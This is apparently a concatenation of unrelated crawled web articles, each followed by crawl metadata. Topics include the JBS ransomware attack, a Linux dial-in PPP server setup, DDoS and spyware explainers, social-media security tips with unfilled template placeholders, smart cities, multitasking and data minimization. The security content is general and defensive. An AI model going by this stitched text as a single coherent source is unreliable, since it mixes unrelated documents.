What Does the JBS Cyberattack Mean for Businesses in Columbia, MD Cybersecurity issues hardly get to the public’s attention until a company with their details becomes a victim of the crime. However, in the past few months, a different kind of threat has taken precedence, threatening the survival of Americans. From gas and now to meat, cybercriminals are hitting the nation and individuals where it hurts the most. In late May 2021, JBS, the world’s largest meat processing company, suffered a ransomware attack. So extensive was the cyberattack that it had the potential to disrupt the food chain around the world. In addition, it raised concerns about the potential spike in meat prices and disruption of food supply as a national security threat. The hack happened a few days after the attack on the Colonial Pipeline, affecting gas supply across the U.S. east coast. According to Andre Nogueira, CEO of JBS, the company parted with $11 million in ransom after being forced to stop operations in 13 of its plants. They made the payment in Bitcoin cryptocurrency to reduce the extent of the damage. While it was a hard decision to make, it helped mitigate further damage to the food supply chain, including grocery stores and restaurants. Have Hackers Shifted to Global Organizations in Ransomware? According to Merrick Garland, U.S. Attorney General, ransomware attacks are getting worse by the day. He echoes concerns by White House officials who have held emergency meetings to work out responses to the national security threat. In response to these two threats, he says that the government must do everything possible as the attacks are becoming more severe. For many years, companies have contended with easy-to-employ ransomware attacks using unsophisticated methods. These include phishing by sending dubious links to unsuspecting employees. Through one link, many companies became victims of cybercrime by having their computer networks locked down in exchange for a ransom. However, their tactic seems to be changing, with their focus being large national corporations. Their strategy includes hacking software to the highest bidder through the “ransom-as-a-service (RaaS)” business model. Hackers ask for payment through cryptocurrency because it’s harder to track than fiat currency. Crypto also has fewer regulations by the government. What Do These Attacks Mean for Your Business? It can be tempting to think that because ransomware attacks focus on global companies, your company is safe. However, cybercriminals are at work, devising ways to attack both large and small businesses. Statistics show that since the onset of COVID-19, more businesses have been victims of hacking than ever before. 67% of small businesses have experienced an attack, while 58% have had a breach. Res This tells you that you can’t afford to be lax about the security of your systems, as the attacks can be devastating for your business. For many small and medium enterprises, the amount hackers demand in ransom is one they can’t afford to pay up and still survive. They also may not have the capacity to recover from the devastation. It also helps to note that the cost of a ransomware attack on a Columbia business is more than the immediate losses. It can lock down the entire business by disrupting its functionality. Your customers who rely on your business to meet their needs may not be patient enough to wait. Some of them will look for a new provider immediately. Once this happens, you may lose them altogether. Others may lack confidence in your business, fearing that their details will become compromised. How Can You Protect Your Business? With the increasing vulnerability of your business systems, it helps to take proactive measures to protect them. While cybersecurity solutions aren’t the ultimate protection, they can go a long way to enhance overall security. This means that your employees also need to be careful and alert to avoid putting your systems at risk, even with these measures in place. The cybersecurity industry is constantly working to improve security standards to protect users. However, the level of compliance to these standards depends on your specific industry and the type of confidential data you handle regularly. The best way to ensure compliance is to work with an experienced cybersecurity solution provider. Even as the standards shift, they will see to it that you remain compliant. Put Up a Robust Data Backup System You can’t afford to run your business without data backups. Your company runs on data, and losing it means that you also lose your business. Restoring it may be costly and time-consuming, and sometimes you may not get everything back. This is where a backup system comes in to help the situation. Having a reliable backup system helps your business get back up and running in the event of an attack. Regular data backup will ensure you have updated copies of the data at all times. Remember to store the backup in a different location from the primary data source. Create a Detailed Disaster Recovery Plan With the frequency of cyberattacks on both large and small businesses, it’s no longer a question of if a disaster will strike. Instead, you should ask yourself how prepared you are to respond when hackers strike. A comprehensive recovery plan will help you carry your business through a disaster. Ensure that every team member knows how to respond to maximize productivity and restoration. In the case of JBS, the company was able to restore everything even before most people knew about the attack. Such a recovery plan can restore consumers’ confidence and enable your company to retain its standing when coming out of an attack. Given the increasing cyberattack incidents, you need to evaluate how prepared your business is for an attack. Check how well-equipped you are to respond to hacking and whether your business would remain standing. The best way to go about this is to work with a cybersecurity expert. They will do an in-depth analysis to test your systems and identify any existing loopholes. Then, they will recommend the most suitable security solutions to protect your business. At Advantage Industries, this is our area of specialization. So contact us today to discuss and analyze your business IT needs and security.
<urn:uuid:269fc7a5-95e6-4a31-996a-e6d60873dc46>
CC-MAIN-2022-40
https://www.getadvantage.com/what-does-the-jbs-cyberattack-mean-for-businesses-in-columbia-md/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00477.warc.gz
en
0.964347
1,259
2.8125
3
Intel Corp’s patent for a RISC-like architecture that can accept multiple operating systems and programs with mixed instruction sets reportedly takes pains to distinguish itself from other dual-mode processors such as DEC’s VAX, a processor made in the 1980s that accepted VAX code and its predecessor PDP-11 code, (CI No 3,193). However one reader suggests there is a fair similarity, as far as this one snippet of description goes, to the DEC PDP-12. Its Laboratory Computer Handbook (1971) describes the PDP-12 processor, which can execute instructions from either of two instructions sets, the PDP-8 instruction set and the LINC instruction set. The PDP-8 was arguably the first RISC computer (well before the acronym RISC had been coined), and the LINC instruction set was rather more complex. Interrupts could be taken in either mode. Instructions from both instruction sets could be mixed within a single program or even a single routine; each instruction set offered an instruction for explicitly switching to the other instruction set. Our reader continues I am sure there are many innovations in Merced, but it is always interesting to observe how history repeats when circumstances are suitable.
<urn:uuid:12dab80d-079f-4ece-8ec2-4ee7a293eae3>
CC-MAIN-2022-40
https://techmonitor.ai/technology/intel_patent_similar_to_decs_1971_pdp_12_1
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00477.warc.gz
en
0.957796
248
2.65625
3
DDoS attacks are the most important security concerns facing customers that are moving their applications to the cloud. Discover what DDOS attacks are, why they're important, and how Cyclotrons offerings can protect your business and customer-sensitive data. What is DDoS? Distributed denial of service attacks, also known as DDoS attacks, is a cybercrime where the attacker floods a server with internet traffic to prevent people from accessing connected online services and sites. This is a very common cyber-attack that is bad for a company's reputation as it discredits their skills and frustrates potential/current customers. Discover some of the largest DDoS attacks here: https://www.a10networks.com/blog/5-most-famous-ddos-attacks/ When companies move their applications to the cloud, DDoS attacks are a huge concern. At Cyclotron, we believe in protecting both businesses and customer-sensitive data to avoid these attacks. Impacts of DDoS attacks According to Infosecurity Magazine, "The average cost of a DDoS attack in the US is around $218k without factoring in any ransomware costs." How we prevent DDoS attacks To prevent DDoS attacks, it is important to have accurate, automatic, and rapid protection. This involves having a solution that can monitor network traffic in real-time, for both small and large attacks. At Cyclotron we secure your cloud or hybrid environment with cloud security solutions to meet the needs of the enterprise. We protect your data, apps, and infrastructure quickly with built-in security services in Azure that include unparalleled security intelligence to help identify rapidly evolving threats early—so you can respond quickly.
<urn:uuid:049aac65-c7f1-4977-a5ff-c5264b8ed28b>
CC-MAIN-2022-40
https://www.cyclotron.com/post/distributed-denial-of-service-ddos-attacks-what-they-are-and-why-they-re-important
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00477.warc.gz
en
0.949223
348
2.671875
3
In part 1 we looked at a simple setup for creating and sharing a dial-up Internet connection. Today we’ll learn how to build a dial-in server. A dial-in server is useful for remote system administration, remote user access, or building a low-cost WAN. A Linux dial-in server can serve as a gateway for both Linux and Windows boxes. There are three primary elements to a Linux dial-in server: A getty – ‘get tty’ – is a daemon that monitors serial lines. Modems are represented by ttySN — /dev/ttyS0, /dev/ttyS1, dev/ttyS2, and /dev/ttyS3. There are all kinds of different Linux and Unix gettys. mgetty is especially good — it supports data, fax, and voice, and integrates nicely with pppd. If your system does not have mgetty, I recommend getting it. At root, open /etc/mgetty/login.config for editing. (Note: check your documentation for file locations, as they may vary.) We want to add this line: /AutoPPP/ – – /usr/sbin/pppd file /etc/ppp/options.server Note that a similar line may already be present: /AutoPPP/ – a_ppp /usr/sbin/pppd auth -chap +pap login debug These represent two different ways of doing the same thing. The first line, which I prefer, puts all the pppd options into a file named /etc/ppp/options.server. You can name this file anything you like. (The docs I learned from use /etc/ppp/options.server, and I’m too lazy to think of something else.) PPP is a peer-to-peer protocol, so our dial-in server options could also go into /etc/ppp/options. Since it’s being used as a server, I like this method as it eases the strain on my aging brain. mgetty is not run from the command line; it’s a daemon. Start it at boot with an entry in inittab: S0:2345:respawn:/sbin/mgetty ttyS0 /dev/ttyS0 Note the tricky bits — on my system the modem is an external serial modem at /dev/ttyS0. I’ve selected runlevels 2,3,4, and 5. Use appropriate values for your system. Then run init -q to start it up. One way to configure etc/ppp/options.server is to copy the contents of /etc/ppp/options, comments and all, and then edit it for dial-in server duties. This is the good and educational method. The fast way is to start fresh and copy the following (be sure to have only one command per line): ‘asyncmap’ could be a chapter by itself — set the value to zero to turn off escaping control characters, unless you have a need to manage escaping control characters (now doesn’t that inspire some interesting mental images…) Do not leave this out, because then by default, all control characters will be escaped, and nothing will work right. The ‘modem’ and ‘crtcts’ lines enable hardware flow control. I can’t imagine using software (xonxoff) flow control, unless you have an unimaginably ancient or bizarre modem. Fortunately, both ancient and bizarre modems are well-supported in Linux, if this is indeed your situation. ‘lock’ is for locking the serial device so that no other system functions can take it over. The ‘require-pap’ and ‘refuse-chap’ lines are examples of selecting the type of authentication. ‘proxyarp’ is very important. All machines dialing in to your server must have an IP address. If they don’t, proxyarp assigns one to the serial port. The first IP address belongs to the server, and the second one, delimited by a colon, is assigned to the user dialing in. Obviously, you don’t want to have any duplicate IPs on the subnet. You can use either PAP or CHAP for authentication, but CHAP is more secure. Username/passwords are stored in /etc/ppp/chap-secrets or /etc/ppp/pap-secrets. On the server, you’ll need to enter all the username/password pairs that are allowed access. The clients need only their own username/password. For the simplest PAP authentication, add the ‘noauth’ option to /etc/ppp/options on all the clients that are authorized to connect to your dial-in server (see the PPPD Auth Gotcha from part 1 for more on this). The format is the same for both, and supplying the username and password is sufficient: user server secret address username * password * Of course, server names and IP addresses can be added for increased security and control. Alternatively, you can do away with PAP/CHAP entirely by adding the following to /etc/ppp/options: This will tell PPP to authenticate against Linux system passwords, rather than hassling with secrets files. Good to Go At this point, we have a functioning dial-in server that you can use for connecting to a fileserver, as a gateway to other PCs inside the network, or as a quick and easy WAN link. (See the Linux Network Administrator’s Guide for how to set up routing using ip-up and ip-down). Dial-on-Demand and Persistent Dialing are two useful methods of keeping a client connected: This is the frugal way to manage a dialup connection. To activate dial-on-demand – when sending email, for example – add these lines to /etc/ppp/options: ‘demand’ means simply run on demand. PPP starts partway, and then waits for the ‘connect’ command. ‘holdoff’ sets, in seconds, how to long to wait between redials. ‘idle’ will disconnect ppp after the configured number of seconds of no activity on the line. To keep the line alive constantly, add these lines to /etc/ppp/options: This tells ppp to stay connected, and to redial after 60 seconds if the connection is broken. That wraps up our two-part look at building dial-up and dial-in servers for Linux. I hope you’ve enjoyed it!
<urn:uuid:097ed260-ae1d-470d-98e2-bd77943de79c>
CC-MAIN-2022-40
https://www.enterprisenetworkingplanet.com/os/building-a-linux-dial-up-server-part-2/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00477.warc.gz
en
0.864048
1,577
2.9375
3
Social media might make it easy to stay connected, but it comes with a lot of negative side-effects–particularly in regard to security for both personal and professional use. If social media isn’t used properly, it could spell trouble for your organization. How can you foster proper social media usage so that your organization doesn’t suffer from poor security practices? It all starts by spreading awareness. There are a lot of reasons why social media can be troublesome. For one, it’s simply not safe, regardless of your age or profession. Many people use the Internet’s anonymity to provide a considerable vector for attacking others. Some might just be trolling others and bothering them, but sometimes this can go too far. Children nowadays who find themselves on social media may be subject to all manner of harassment from their peers, and it’s all thanks to the Internet giving the perceived notion that nothing that they do on it has consequences. The other more business-minded side of social media attacks come in the form of phishing scams and other attacks on sensitive information. Hackers will stop at nothing to steal information of value from both individuals and companies. You might be surprised by how much value a hacker can get out of your personally identifiable information. Many users share sensitive information like their address, phone number, email, and much more, all often publicly on display on social media profiles. Other times, hackers might take advantage of phishing tactics to weasel information out of users. They can be surprisingly crafty in these endeavors, going as far as impersonating people that you know. They might send personal messages in hopes that you’ll respond and give them the opportunity they need to steal your information. It’s clear that you need to be smart about what you post and when you post it, but what’s the best way to do so? For starters, it’s important to remember that everything you do on social media can likely be traced back to you. That status that you made about the workplace or an unsavory comment about a client could come back to bite you in the future. Be conscious about what you’re posting and ask yourself if it really needs to be out in the public domain. Chances are that it doesn’t. This will also keep you from sharing pictures of your meals, which is a bonus for pretty much all of your social media connections. Second, be careful of any information that you share with anyone over social media. If someone is messaging you out of the blue and asks you for something personal, perhaps you should think twice before telling them your bank account number or Social Security number. If there is ever any doubt about whether or not the one messaging you is genuine, a simple rule is to not give up anything of value to suspicious people on social media. For more great tips and tricks about how to stay secure, reach out to COMPANYNAME at PHONENUMBER.
<urn:uuid:8f719096-06ca-4e10-94b4-625ac0bbace9>
CC-MAIN-2022-40
https://www.activeco.com/making-vulnerable-social-media/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00677.warc.gz
en
0.940055
612
2.8125
3
Artificial Intelligence systems are being used more and more in our everyday lives to help us humans make decisions. Right now many AI algorithms are a black box; we’re not quite sure how the system arrives at an outcome and this is a problem. The solution is to come up with AI systems that explain their decision-making – what is known as Explainable AI or XAI. But what exactly is explainable AI? In this explainer video, Cognilytica analysts explain the current problem, define XAI, and show why it’s important to have.
<urn:uuid:7af8b2a1-eea2-4ca0-9de8-d2f254c46949>
CC-MAIN-2022-40
https://www.cognilytica.com/2018/07/06/explainer-video-what-is-explainable-ai-xai/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00677.warc.gz
en
0.952882
123
2.921875
3
This morning, while sipping my favorite green tea at home, I automatically checked my smartphone for office mail. Although there was no reason for not enjoying the morning time with self, sub-consciously an escalation thread was happening in my mind and my intention was to check the current status of that escalation, which was occupying a portion of my mind concerning one of my projects. While going through the various threads of communication, and sensing some anxiety entering my mind, I suddenly wondered what I was doing during the best time of my day. This is nowadays very common, a recurring instance that perhaps many of us experience. The competitive world, long working hours, rising expectations on the personal and professional fronts, work pressures and personal aspirations; all demand a multi-tasking of the mind. All of us are used to multi-tasking, and it is a quality without which we cannot think of completing our day. If we take time to notice, we will find out how frequently we multi-task. When we drive vehicles, text, use computers, make phone calls and attend meetings, we are subconsciously juggling various tasks and ranking them based on their perceived order of importance. Some other examples include drafting a mail while attending a call, listening to music while working on a document, and working on more than one project/task at a time like driving and attending a call (which is proven to be very dangerous). Understanding the importance and high usage of multi-tasking in our daily lives, I researched the subject and was amazed to find out the following facts: - Multi-tasking is a computer industry term, which refers to the special ability of microprocessors to perform several tasks in parallel by dividing the RAM (Random Access Memory) into various parts (Reference: Wikipedia). Nowadays, multi-tasking seems to be an important KRA (Key Result Area) of the human mind which is actually like a computer where the same performance is expected of it. - Computers multi-task. Humans don't. A computer's operating system enables it to perform more than one task at a time without losing data or failing to process information. The human brain doesn’t work this way. What we call "multi-tasking" is actually "serial tasking" or "task-switching" — moving from one task to another in rapid succession. - Our ability to focus on different things is one of the strengths of our truly incredible minds. It's a skill we would definitely not want to lose. However, psychologists and neurobiologists have both shown that we pay a price when we multi-task. Since the depth of our attention governs the depth of our memory and thought, multi-tasking can reduce our ability to understand and learn. While we are able to do more when we multi-task, we learn less. As we juggle an increasingly large number of different tasks, we start to pay a price in our cognition. - There have been studies to prove that the human brain is not meant for multi-tasking, more often called ‘brain juggling’ in psychological terms. Robert Rogers, Ph. D, and Stephen Monsell, D. Phil found that on switching between two tasks, the human brain comes across two types of resistance - firstly - to adjust the mental controls to attune to the new task, and secondly - to stop the mental controls from processing the first task. The cost of switching tasks is always higher than repeating the same task. It is approximately 40%, which cannot be neglected. - As the task becomes more complex, the cost of switching between tasks gets higher. Complex tasks always require deep research, and the deeper the mind goes into a task, the more time it would take to come out of that task. In this scenario, switching between two tasks becomes tough. - When you’re trying to accomplish two dissimilar tasks, each one requiring some level of consideration and attention, multi-tasking falls apart. Your brain just can’t take in and process two simultaneous, separate streams of information and encode them fully into short-term memory. When information doesn’t make it into short-term memory, it can’t be transferred into long-term memory for recall later. - Multi-tasking involves engaging in two tasks simultaneously. But here's the catch. It's only possible if two conditions are met: 1) at least one of the tasks is so well learned as to be automatic, meaning no focus or thought is necessary to engage in the task (e.g., walking or eating), and 2) they involve different types of brain processing. For example, you can read effectively while listening to classical music because reading comprehension and processing instrumental music engage different parts of the brain. However, your ability to retain information while reading and listening to music with lyrics declines significantly because both tasks activate the language center of the brain. - Multi-tasking may seem to be efficient at surface but in reality it costs more, and also affects the quality while increasing error. For example, using a cell phone while driving and losing by a second in task switching can cost one’s life, which cannot be compensated by any means. We are in control of the information we receive. By filtering the flow of data and registering what is really important for us, we can develop the practice to improve focus in our everyday lives. However, reducing information overload doesn't require blocking or abandoning technological tools, which is kind of a necessity in today’s world. Instead, we need to find effective ways to accept only relevant information and discard or minimize superficial information. The best way to do this is through awareness of the danger of long term multi-tasking through which we can achieve a more favorable and effective environment at home or the workplace. Wonderfully, this piece of information can be used in understanding user psychology in the field of user experience design. We are now building applications in bulk for smart phones, tablets and devices on the move. Keeping the effect of multi-tasking in mind, we can understand how much attention to detail a user exerts on applications on such devices. These apps must be ’brain-dead simple’ to work well. The adaptive quality of the human mind can be used in a more constructive way by focusing its massive energy on a task to perfect completion or can be used in a dissipative way to lose its energy through multi-tasking. The choice is ours. Rubenstein J, Meyer DE, Evans JE. (2001). Executive Control of Cognitive Processes in Task Switching. Journal of Experimental Psychology. 27(4):763-797 Crenshaw, Dave. The Myth of Multitasking; How "Doing it All" gets Nothing Done. Jossey-Bass 2008.
<urn:uuid:eeb8a97e-b611-4bce-8bf5-50a991e66f0b>
CC-MAIN-2022-40
https://www.hcltech.com/blogs/human-multitasking-and-its-cognitive-effects
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00677.warc.gz
en
0.945315
1,420
2.828125
3
– no title specified Tel: + 44 7788 456988 “Providing thought leadership for ICT decision makers” This email contains graphics, so if you don’t see them, view it in your browser. Connect-World’s eFlyer – 16th Feb 2018 A smart city is an urban environment that utilises a variety of electronic data collection sensors to provide information which is used to manage assets and resources efficiently. It includes data collected from citizens, devices, and assets that is processed and analysed to monitor and manage traffic and transportation systems, power plants, water supply networks, waste management, law enforcement, information systems, schools, libraries, hospitals, and other community services. Smart Cities draw on information and communication technology (ICT), and the emerging network the Internet of things (IoT), to optimize the efficiency of city operations and services and connect to citizens. The overarching mission of a smart city is to optimize city functions and drive economic growth while improving quality of life for its citizens using smart technology and data analysis. Other terms that have been used for similar concepts include: Cyberville, digital city, electronic communities, flexicity, information city, intelligent city, knowledge-based city, MESH city, telecity, teletopia, ubiquitous city, wired city. ICT technology is used to enhance quality, performance and interactivity of urban services, to reduce costs and resource consumption and to increase contact between citizens and government. Smart city applications are developed to manage urban flows and allow for real-time responses. A smart city is therefore in a position to directly respond to challenges than one with a simple “transactional” relationship with its citizens. Smart city technology is also increasingly being used to improve public safety, from monitoring areas of high crime to improving emergency preparedness with sensors. For example, smart sensors can be critical components of an early warning system before droughts, floods, landslides or hurricanes. Major technological, economic and environmental changes have generated interest in smart cities, including climate change, economic restructuring, the move to online retail and entertainment, ageing populations, urban population growth and pressures on public finances. The European Union (EU) has devoted constant efforts to devising a strategy for achieving ‘smart’ urban growth for its metropolitan city-regions. The EU has developed a range of programmes under ‘Europe’s Digital Agenda”. In 2010, it highlighted its focus on strengthening innovation and investment in ICT services for the purpose of improving public services and quality of life. Arup estimates that the global market for smart urban services will be US$400 billion per annum by 2020. Prominent examples of Smart City technologies and programmes have been implemented in Singapore, Dubai, Milton Keynes, Southampton, Amsterdam, Barcelona, Madrid, Stockholm, New York and Beijing which has about 500 smart city pilot projects, the highest in the world, according to Deloitte]. Often considered the gold standard of Smart Cities, the city-state of Singapore uses sensors and IoT-enabled cameras to monitor the cleanliness of public spaces, crowd density and the movement of locally registered vehicles. Its smart technologies help companies and residents monitor energy use, waste production and water use in real time. Singapore is also testing autonomous vehicles, including full-size robotic buses, as well as an elderly monitoring system to ensure the health and well-being of its senior citizens. In spite of the great benefits of smart cities, critics worry that city managers will not keep data privacy and security top of mind, fearing the exposure of the data that citizens produce on a daily basis to the risk of hacking or misuse. Additionally, the presence of sensors and cameras may be perceived as an invasion of privacy or government surveillance. To address this, smart city data collected should be anonymized and not be personally identifiable information. Thus, while, many different IoT devices are catching on with consumers, from smart watches to connected cars, consumers are uneasy about being watched, listened to, or tracked by devices they place in their homes. Thanks to such discomfort, consumer interest in connected home technology lags behind their interest in other types of IoT devices, Deloitte found. Cities and communities generate data through a vast and growing network of connected technologies that power new and innovative services ranging from apps that can help drivers find parking spots to sensors that can improve water quality. Such services improve individual lives and make cities more efficient. While smart city technologies can raise privacy issues, sophisticated data privacy programs can mitigate these concerns while preserving the benefits of cities that are cleaner, faster, safer, more efficient, and more sustainable.
<urn:uuid:c8bbc26e-ac41-4916-9bae-7ae20db58bd5>
CC-MAIN-2022-40
https://connect-world.com/smart-cities/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335034.61/warc/CC-MAIN-20220927131111-20220927161111-00677.warc.gz
en
0.921658
994
2.796875
3
Spyware is a type of malware that covertly infects a computer or mobile device and collects sensitive information like passwords, personal identification numbers (PINs), and payment information. The information is then sent to advertisers, data collection firms, or malicious third parties for a profit. Spyware is one of the most common threats on the internet. It was more commonly installed in Windows desktop browsers, but has evolved to operate on Apple computers and mobile phones as well. Mobile spyware attacks have become much more common and advanced as people rely on their phones to conduct banking activities and access other sensitive information. However, not all software that tracks online activity is malicious. For example, some website tracking cookies can serve as a legitimate function to customize a user’s website experience by remembering login information. Anyone can be a target of spyware. Authors of spyware do not typically target a specific person like a spear phishing attack would. Spyware authors prioritize the information they can gather rather than who it is from, so spyware attacks try to collect as many victims as possible. Since spyware typically runs in the background of the operating system, it is difficult to detect and even harder to mitigate without advanced security tools and solutions. 2022 CrowdStrike Global Threat Report Download the 2022 Global Threat Report to find out how security teams can better protect the people, processes, and technologies of a modern enterprise in an increasingly ominous threat landscape.Download Now Types of Spyware There are several types of spyware. While all spyware programs share the common goal of stealing personal information, each uses unique tactics to do so. Adware tracks a user’s web surfing history and activity to optimize advertising efforts. Although adware is technically a form of spyware, it does not install software on a user’s computer or capture keystrokes. Thus, the danger in adware is the erosion of a user’s privacy since the data captured by adware is accumulated with data captured about the user’s activity elsewhere on the internet. This information is then used to create a profile that can be shared or sold to advertisers without the user’s consent. A trojan is a digital attack that disguises itself as desirable code or software. Trojans may hide in games, apps or even software patches. They may also be embedded in attachments in phishing emails. Once downloaded by users, trojans can take control of victims’ systems for malicious purposes such as deleting files, encrypting files or sharing sensitive information with other parties. A keylogger is a type of spyware that monitors user activity. When installed, keyloggers can steal passwords, user IDs, banking details and other sensitive information. Keyloggers can be inserted into a system through phishing, social engineering or malicious downloads. 4. System Monitor A system monitor captures virtually everything the user does on the infected computer or device. System monitors can be programmed to record all keystrokes, the user’s browser activity and history, as well as any form of communication, such as emails, webchats or social media activity. RedShell is a type of spyware that installs itself on a device whenever specific PC games are downloaded to track online activity. Developers use this information as feedback to better understand their users, and improve their games and marketing campaigns. Rootkits allow attackers to easily infiltrate a system, as they are almost always undetectable. To infiltrate a system, they either exploit security vulnerabilities or logging as an administrator. 7. Tracking Cookies Websites, both legitimate and illegitimate, drop cookies into your device to track users’ online activity. What Does Spyware Do? This three-step process provides a general overview of how an author launches their spyware attack: - Infiltrate: Spyware may infiltrate any device upon visiting a malicious website, installing a malicious app, or even opening a file attachment in an email. - Monitor and capture: Once the spyware is installed, it begins to collect data, which could range from web activity and history to keystrokes. - Send or sell: The spyware creator collects the data where they can either use it directly or sell it to third parties. The presence of spyware will generally slow down the computer or device, degrading its usability and functionality over time. Due to decreased functionality, the system may also be more vulnerable to other types of malware. How Spyware Infects Devices Spyware is commonly installed onto a device by the user unknowingly downloading it themselves. It is often hidden within seemingly legitimate websites or software through vulnerability exploits. Some of the most common ways spyware infects devices: - Phishing and spoofing - Spyware hidden within software bundles - Downloading software from an unreliable source - Downloading malicious mobile apps - Opening email attachments or clicking links from unknown senders - Pirating media such as movies, music, or games - Agreeing to the terms and conditions of a program before carefully reading them - Accepting cookie consent requests from untrusted websites - Security vulnerabilities within a website or program What Are Examples of Issues Caused by Spyware on a Device? Once a system is compromised, the spyware begins to collect the user’s behavior data. Common tracking activities include: - Recording keystrokes (i.e., a keylogger) to gather anything that is typed, including user names, passwords, banking details, credit card numbers and contact information. - Tracking online activity including website visits, browsing history, people they interact with and messages they send in order to create a detailed profile of the user. - Assume control of the computer or device and reset the browser’s homepage, alter search results or flood the device with pop-up ads. - Reconfigure the device’s security settings, including the firewall, to allow remote control over the device or intercept attempts to remove the spyware. How to Protect Against Spyware Because any user’s device may become vulnerable to spyware, it is important to understand how to protect oneself against spyware. The first line of defense is to prevent spyware from being installed onto your device, and this can be achieved by being cautious of your own behavior while online. - Use reputable antivirus software with spyware protection, preferably a cloud-native security solution. - Use a pop-up blocker or avoid clicking pop-up ads. - Keep your computer or mobile operating systems updated. - Never open unsolicited or suspicious email attachments from unverified senders. - Don’t click links in text messages from unknown senders. - Be cautious about consenting to website cookies. - Be wary of free software and make sure to carefully read the terms and conditions. - Put a screen lock on your smartphone and use strong passwords on all devices - Avoid using unsecured Wi-Fi or use a VPN - Look carefully at the permissions you grant apps when you install them How to Remove Spyware Removing Spyware From Your Computer If you notice signs of a spyware infection on your desktop or laptop computer, take these steps to remove it: - Download and run a virus removal tool. Make sure the antivirus software is advanced so it can scan for all kinds of threats. - Once the system is cleared, consider contacting your financial institutions to inform them about possible fraudulent activity. - If any stolen information is sensitive then you may want to contact local law-enforcement authorities to report potential violations of federal and state laws. - Once you’ve cleaned your system, consider downloading anti-spyware tools to further protect your devices from spyware in the future. Removing Spyware From Your Mobile Phone If you notice signs of a spyware infection on your mobile device, take these steps to remove it: - Uninstall apps you don’t recognize. Go to your phone’s settings, click on “Apps,” and uninstall any suspicious apps. - Run an antivirus or malware scan: You may have an app that came installed with your phone, or you may need to download and install a reputable app from the official app store for your device. - If the steps above do not solve the issue, you can back up your data then factory reset your phone. Data can be uploaded onto Google or iTunes/iCloud so you’ll be able to restore all your data to your freshly cleaned phone after resetting it. A factory reset removes all data and downloaded programs from the device and leaves it in its original ‘factory’ state. - Run a second antivirus or malware scan after you reinstall your data. Sometimes the first scan does not completely remove spyware.
<urn:uuid:be17be36-b5bc-4450-8438-447898acc588>
CC-MAIN-2022-40
https://www.crowdstrike.com/cybersecurity-101/what-is-spyware/
null
s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00677.warc.gz
en
0.898928
1,857
3.15625
3
IT excels in copying data. It is well known organizations are storing data in volumes that continue to grow. However, most of this data is not new or original, much of it is copied data. For example, data about a specific customer can be stored in a transactional system, a staging area, a data warehouse, several data marts, and in a data lake. Even within one database, data can be stored several times to support different data consumers. Additionally, redundant copies of the data are stored in development and test environments. But business users also copy data. They may have copied data from central databases to private files and spreadsheets. The growth of data is enormous within organizations, but a large part consists of non-unique, redundant data. In addition to all these intra-organizational forms of data redundancy, there is also inter-organizational data redundancy. Organizations exchange data with each other. In almost all of these situations, the receiving organizations store the data in their own systems, resulting in more copies of the data. Especially between government organizations, a lot of data is sent back and forth. Some redundant data is not stored in its original form but in an aggregated or compressed form. For example, many data marts contain somewhat aggregated data, such as individual sales transactions that are aggregated by the minute. Data needs to be stored multiple times for a variety of compelling reasons. But database server performance and network speed have improved enormously, making it needless in most cases. Unfortunately, new data architectures are still designed to store data redundantly. Some data infrastructures are just overloaded with data lakes, data hubs, data warehouses, and data marts. We think too casually about copying data and storing it redundantly. We create redundant data too easily, which leads to the following 5 drawbacks: - Change Control Issues First, when source data is changed, how can we guarantee that all of the copies, stored in internal IT systems, business users’ files, and by other organizations, are changed accordingly and consistently? This is very difficult, especially if there is no overview of which copies exist, internally and externally. - Compliance Struggles Second, storing data in multiple systems complicates complying with GDPR. As JT Sison writes: “An important principle in the European Union’s General Data Protection Regulation (GDPR) is data minimization. Data processing should only use as much data as is required to successfully accomplish a given task. Additionally, data collected for one purpose cannot be repurposed without further consent.” Implementing the “right to be forgotten” becomes much more complex when customer data is scattered across many databases and files. And if data has been stored that many times, do we know where all the copies are? - Manual Labor Woes Third, the more often data is stored redundantly, the less flexible the data architecture. If the source data definition changes, all of the copies also need to be changed. For example, if the data type of a column changes, or if the codes used to identify certain values change, changing all of the copies is an enormous undertaking. - Data-Access Slowdowns The fourth drawback relates to data latency. Accessing copied data implies working with non-real-time data. The frequency of copying largely determines data latency; the lower the frequency, the higher the data latency. In some situations the copying processes takes hours, which also increases data latency. Data latency becomes very high when data is copied multiple times before it becomes available for usage. - Data Quality Challenges Finally, copying data can also lead to incorrect data, causing data quality issues. Processes that are responsible for copying data can crash midway leaving the target data store in an unknown state. To fix this, data may need to be unloaded and reloaded. This frequent unloading, fixing, and reloading can lead to incorrect data. Some data may be loaded twice, not loaded at all, or loaded incorrectly. Each copying process introduces a potential data quality leak. The Way Forward Data minimization should be a guiding principle for any new data architecture. This should apply to redundant data storage within an organization, but also to inter-organizational data flows. Also, data should not be sent to other organizations periodically; organizations should request the data when they need it, without having to store it themselves. In this respect, data should be available just like video-on-demand. We do not have to download and copy a video just to view it, and when we want to watch it, it is simply streamed to us. Similarly, data should not be unnecessarily copied, and data minimization should be our guiding principle. Data infrastructures should offer data-on-demand to internal and external users. - The Data Lakehouse: Blending Data Warehouses and Data Lakes - April 21, 2022 - Use the Cloud More Creatively - January 28, 2022 - Data Minimization as Design Guideline for New Data Architectures - May 6, 2021
<urn:uuid:917ce603-aa7b-4659-abbe-e1987d68e0c8>
CC-MAIN-2022-40
https://www.datavirtualizationblog.com/data-minimization-design-guideline-new-data-architectures/
null
